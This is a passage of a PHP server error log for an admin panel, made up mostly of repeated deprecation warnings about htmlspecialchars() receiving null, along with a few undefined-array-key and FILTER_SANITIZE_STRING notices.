/home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:08:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 22:10:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 22:15:44 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:16:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 22:16:39 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:16:53 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:16:54 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:44:06 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 31 [05-Dec-2024 22:44:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 31 [05-Dec-2024 22:44:16 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 31 [05-Dec-2024 22:44:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [05-Dec-2024 22:44:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [05-Dec-2024 23:15:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 23:30:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 23:33:47 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:34:23 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:34:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:35:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:36:19 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 